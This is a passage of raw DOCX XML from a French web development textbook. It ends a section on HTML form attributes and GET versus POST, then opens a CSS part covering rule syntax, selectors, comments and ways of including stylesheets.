        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclenche le pavé numérique et active les bornes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Le client est sous le contrôle de l'utilisateur : toute donnée envoyée doit être revalidée côté serveur.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-describedby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointe vers l'identifiant du texte d'aide ou d'erreur, qui est alors annoncé avec le champ.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> place les données dans l'URL, où elles sont visibles dans l'historique et les journaux. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> place les données dans le corps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId15"/>
          <w:footerReference w:type="default" r:id="rId16"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE II</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>CSS : mise en forme et design</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Maîtriser la cascade, la typographie, les couleurs et le modèle de boîte pour transformer un document en interface.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. Premiers pas en CSS · 2. Sélecteurs, variables et unités · 3. Typographie web · 4. Couleurs, fonds et contrastes · 5. Le modèle de boîte · 6. Bordures, ombres et profondeur · 7. Composants d'interface et états · 8. Transitions et animations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. Premiers pas en CSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Une règle, un sélecteur, une déclaration : la grammaire d'une feuille de style et la logique de la cascade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Débutant · Prérequis : chapitre 8</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Écrire et organiser une feuille de style lisible.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Comprendre la cascade, l'héritage et la spécificité.</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Utiliser les sélecteurs simples et les combinateurs.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Appliquer des styles sans casser la structure du document.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Diagnostiquer une règle qui ne s'applique pas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 Une grammaire simple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une feuille de style est une suite de règles. Chaque règle associe un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sélecteur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à un bloc de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>déclarations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Une déclaration comporte une propriété et une valeur, séparées par deux-points et terminées par un point-virgule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux règles, quatre déclarations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sélecteur { propriété: valeur; } */</w:t>
        <w:br/>
        <w:t>h1 {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.2;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.citation {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-left: 3px solid #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-left: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #274b6d;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les commentaires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/* ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servent à documenter une intention, pas à commenter l'évidence. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/* couleur du titre */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'apporte rien ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/* contraste vérifié AA sur fond blanc */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> informe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.28 — Le vocabulaire de base de CSS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45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Élément de syntaxe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sélecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.intro</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>#entete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cible les éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Déclaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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color: navy;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Une propriété, une valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Combinateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>article &gt; p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Relation entre sélecteurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Pseudo-classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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a:hover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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État de l'élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pseudo-élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>p::first-line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie d'un élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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At-règle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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@media</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@supports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Bloc conditionnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 Trois façons d'intégrer du CSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une feuille externe est la bonne pratique : elle est mise en cache, partagée entre les pages et maintenable. Les deux autres méthodes ont des usages marginaux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.29 — Trois méthodes d'intégration et leur légitimité</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165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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="405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Écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Quand l'utiliser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1653"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;link rel="stylesheet" href="style.css"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toujours, en production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="165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Interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="405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&lt;style&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans le </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>head</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Prototype, page isolée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
